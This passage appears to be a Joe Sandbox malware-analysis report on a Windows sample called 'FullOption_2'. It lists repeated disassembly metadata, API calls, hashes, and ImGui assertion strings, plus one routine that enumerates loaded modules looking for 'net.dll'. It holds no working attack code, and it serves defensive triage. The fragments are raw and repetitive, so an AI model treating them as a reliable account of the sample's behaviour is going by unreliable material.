                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertfree
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3366704412-608382026
                                                                                  • Opcode ID: 0c423ce21b426229d28bbf5f168631c1e386835c06d3c64bbaf378cc4fd46694
                                                                                  • Instruction ID: 70b189c15a4a749822ece89feb86d236c89d7e3895fd7fa3333288cf16faa924
                                                                                  • Opcode Fuzzy Hash: 0c423ce21b426229d28bbf5f168631c1e386835c06d3c64bbaf378cc4fd46694
                                                                                  • Instruction Fuzzy Hash: 33319D36A0AB4382EB64AF16E8501387760FF64B84F442532EE5D87B94DF3CE852D350
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6EE8A0: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6EE771,?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE93E
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE78A
                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE7E9
                                                                                  • memcpy.VCRUNTIME140(?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE810
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF6AE6D7538), ref: 00007FF6AE6EE833
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert$freemallocmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$FindSettingsHandler(handler->TypeName) == 0
                                                                                  • API String ID: 2920042107-137986346
                                                                                  • Opcode ID: cc2b706ef406c531f4539671360e6dc40d1816f56a4a0fcc11ff622e5283493f
                                                                                  • Instruction ID: ac735df975373763f3a547dc5a6f5525345202ff38157332ce71afd3a28e1cd0
                                                                                  • Opcode Fuzzy Hash: cc2b706ef406c531f4539671360e6dc40d1816f56a4a0fcc11ff622e5283493f
                                                                                  • Instruction Fuzzy Hash: E5419136A16F8282EB10AF26DC501B97760FBA4B85F096635EF5E87355DF38E081C740
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?,00007FF6AE6E8CF4,?,?,?,?,00000000,00007FF6AE6E331D), ref: 00007FF6AE6E344A
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,?,00007FF6AE6E8CF4,?,?,?,?,00000000,00007FF6AE6E331D), ref: 00007FF6AE6E3478
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size$window == window->RootWindow
                                                                                  • API String ID: 3234217646-2469774095
                                                                                  • Opcode ID: bf45b80bb6262de5a585415725fca2dddc76bb9dfe981f6d6d593b1b0fc3d85a
                                                                                  • Instruction ID: 300cfd40fa445cfe1ca03f3e0250f2fa7ca4584924b07bc7f983bb22c857f87a
                                                                                  • Opcode Fuzzy Hash: bf45b80bb6262de5a585415725fca2dddc76bb9dfe981f6d6d593b1b0fc3d85a
                                                                                  • Instruction Fuzzy Hash: 9B31B232A0EB82C5E722AF12D8442797760FB61B48F4C2570FA0D8B6D8CF3CE4419750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$button >= 0 && button < ((int)(sizeof(g.IO.MouseDown) / sizeof(*(g.IO.MouseDown))))$button >= 0 && button < ImGuiMouseButton_COUNT
                                                                                  • API String ID: 3234217646-1752313745
                                                                                  • Opcode ID: c7381f7dc58de125363e3b056a773cc4d56ba6c66b8189bc66d556487795aaa3
                                                                                  • Instruction ID: ab5b77371b13a407fab1d09ddb8336d77b7a347e778a5b488d7fdf606e98feaf
                                                                                  • Opcode Fuzzy Hash: c7381f7dc58de125363e3b056a773cc4d56ba6c66b8189bc66d556487795aaa3
                                                                                  • Instruction Fuzzy Hash: 02118F20E1E98244FB686B26E8983B92290EF26394F547472F65EC21D48F6DF985DB40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Module32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmp
                                                                                  • String ID: net.dll
                                                                                  • API String ID: 913386257-2431746569
                                                                                  • Opcode ID: d7d3957a46eed3f8bdfc1ada9717bc2617e87f74641b0d433e5ee5110fa0a946
                                                                                  • Instruction ID: b0c9962420b2bab945b4a6ead485d941d12b2556341a6e7b208c39af913ffd11
                                                                                  • Opcode Fuzzy Hash: d7d3957a46eed3f8bdfc1ada9717bc2617e87f74641b0d433e5ee5110fa0a946
                                                                                  • Instruction Fuzzy Hash: 4D01882570EB8795E660AF12F4503356390FB54BA5F986234F96E832E4DF7CD1498700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$window->IDStack.Size > 1
                                                                                  • API String ID: 3234217646-127926622
                                                                                  • Opcode ID: ae223b799a119cbdd55c56e3489104d60dbb46b2c5a007753c1f3a2a031baf8e
                                                                                  • Instruction ID: f02e33f1844f33b6cd107980ba8a695a8937282c1f4040bf7f6e4e02a71aefde
                                                                                  • Opcode Fuzzy Hash: ae223b799a119cbdd55c56e3489104d60dbb46b2c5a007753c1f3a2a031baf8e
                                                                                  • Instruction Fuzzy Hash: F9F05E31A5A983C1FB20AF1ADC546B42370FB24B45F882071E91E865A5EF2CD586C750
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memchrmemcpy$Concurrency::cancel_current_task
                                                                                  • String ID:
                                                                                  • API String ID: 328061733-0
                                                                                  • Opcode ID: 95a9576e2bedf53b65d46f6924330ac05cd8b03484e40e3bc8d173dc2ed4195b
                                                                                  • Instruction ID: 18c860e7baa7f00c922bc3c6d352976c3ab2175efa6adef885a1011e7e3502b7
                                                                                  • Opcode Fuzzy Hash: 95a9576e2bedf53b65d46f6924330ac05cd8b03484e40e3bc8d173dc2ed4195b
                                                                                  • Instruction Fuzzy Hash: 0A51B46270A78285EA14AF57E5002BD66A0BF65BF0F684630EE7D9B7D5DF3CE4418310
                                                                                  APIs
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,00007FF6AE75D51C,?,?,?,?,00000000,00007FF6AE6D2117), ref: 00007FF6AE75F159
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,00007FF6AE75D51C,?,?,?,?,00000000,00007FF6AE6D2117), ref: 00007FF6AE75F169
                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6AE75D51C,?,?,?,?,00000000,00007FF6AE6D2117), ref: 00007FF6AE75F1A7
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,00007FF6AE75D51C,?,?,?,?,00000000,00007FF6AE6D2117), ref: 00007FF6AE75F1B1
                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,00007FF6AE75D51C,?,?,?,?,00000000,00007FF6AE6D2117), ref: 00007FF6AE75F1C1
                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6AE75F1F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1775671525-0
                                                                                  • Opcode ID: b60901c949b79167f93b6c2050a59d0ea4091dcff3a5fb4ddc00081dd9d7a9d0
                                                                                  • Instruction ID: a46e363ede39e777ca755a8a923255c2cce09b92c718e80a7621936355442953
                                                                                  • Opcode Fuzzy Hash: b60901c949b79167f93b6c2050a59d0ea4091dcff3a5fb4ddc00081dd9d7a9d0
                                                                                  • Instruction Fuzzy Hash: B3419162B0AB4591EE14AB17E8042A9A365FB64BE0F544731EB7D8BBD5DF3CE041C314
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memchr$Xlength_error@std@@
                                                                                  • String ID: string too long
                                                                                  • API String ID: 955973381-2556327735
                                                                                  • Opcode ID: 98c250c2fdbfda540b493a6b42b462df3a39ce26a893fb5d4a1360790fc1009a
                                                                                  • Instruction ID: 1e88ac9860465f9b441664c3017c6b3d3337158960958322d5617ff15fb41bba
                                                                                  • Opcode Fuzzy Hash: 98c250c2fdbfda540b493a6b42b462df3a39ce26a893fb5d4a1360790fc1009a
                                                                                  • Instruction Fuzzy Hash: 1EF1D732909BC985E212AB37D0413F9B3A4EF7A384F199731FA49765A5DF39A581CB00
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF6AE6D5AF8
                                                                                  • memchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF6AE6D5C5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemchr
                                                                                  • String ID: %*s%.*s$D:\ALLLLREALSHY\src\$font->ContainerAtlas->TexID == _CmdHeader.TextureId
                                                                                  • API String ID: 990298081-1748331708
                                                                                  • Opcode ID: 35ac934c101710280845e32392e0a07b47de8f1a659e9823e0613a12fc0dc5e4
                                                                                  • Instruction ID: d196926008876c416e672527072c90374b9c63484a6ebd0772ff72e3a7301747
                                                                                  • Opcode Fuzzy Hash: 35ac934c101710280845e32392e0a07b47de8f1a659e9823e0613a12fc0dc5e4
                                                                                  • Instruction Fuzzy Hash: EFA16766A0AFC186E610FB12A4847BA73D0FB24798F586631EE4C97AC5DF2CD084D700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000100000000), ref: 00007FF6AE6D5E4A
                                                                                  • memchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000100000000), ref: 00007FF6AE6D5FAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertmemchr
                                                                                  • String ID: %*s%.*s$D:\ALLLLREALSHY\src\$font->ContainerAtlas->TexID == _CmdHeader.TextureId
                                                                                  • API String ID: 990298081-1748331708
                                                                                  • Opcode ID: d5c87765c77bdb85c8b67adf4a22c0ff0916b35d9effeddb0c402f601e873d3d
                                                                                  • Instruction ID: 5644dfcde840aed178fc13ddcdfea7bd4d94ed65dca0e5518526b1436e4e2dcf
                                                                                  • Opcode Fuzzy Hash: d5c87765c77bdb85c8b67adf4a22c0ff0916b35d9effeddb0c402f601e873d3d
                                                                                  • Instruction Fuzzy Hash: 3891582290AFC58AE721EB16E4447BAB7D4FF64788F586531EE4C97A95DF2CE084C700
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6D5840: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D586E
                                                                                    • Part of subcall function 00007FF6AE6D5840: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D58B8
                                                                                    • Part of subcall function 00007FF6AE6D5840: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D58EF
                                                                                    • Part of subcall function 00007FF6AE6D5840: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6D5954
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6DD0AA
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6DD0CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$g.WithinEndChild == false$window->Flags & ImGuiWindowFlags_ChildWindow
                                                                                  • API String ID: 3234217646-770910017
                                                                                  • Opcode ID: c6f01e4ae46de05d6c6b88667daa8309c0fbab602b499d23ae1c2cc362b93559
                                                                                  • Instruction ID: 9e952173cd9ce58627433becb6cc915fb625e0a249f940237303c59b5fd1f5dd
                                                                                  • Opcode Fuzzy Hash: c6f01e4ae46de05d6c6b88667daa8309c0fbab602b499d23ae1c2cc362b93559
                                                                                  • Instruction Fuzzy Hash: 8281D032D09AC58AE311AF37C4843ED33B0FF69308F59AB31FA48665A4DF39A5559B40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memchr$_wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$old_size >= 0 && new_size >= old_size && new_size >= EndOffset
                                                                                  • API String ID: 366788900-4050437265
                                                                                  • Opcode ID: b5c96cb5bd852eb2b39dfcdd409ce07fdc3abd439f407040c9181d51d8c79620
                                                                                  • Instruction ID: 6991388b249524accc0b8d2a63a99f9a5892edc941ec07b301bc2918b41e7149
                                                                                  • Opcode Fuzzy Hash: b5c96cb5bd852eb2b39dfcdd409ce07fdc3abd439f407040c9181d51d8c79620
                                                                                  • Instruction Fuzzy Hash: E841F636716A52C7EB14EE2AD48027C77A0FB65F80B956435EA0DC7B44EF3DE8068700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$[nav] NavInitRequest: from NavInitWindow(), init_for_nav=%d, window="%s", layer=%d$g.NavWindow != 0$window == g.NavWindow
                                                                                  • API String ID: 3234217646-3331238723
                                                                                  • Opcode ID: 47a9054aa822baaecd87d7d62015d9a7781ae8c0eb9c3598a44f1242569bfaf0
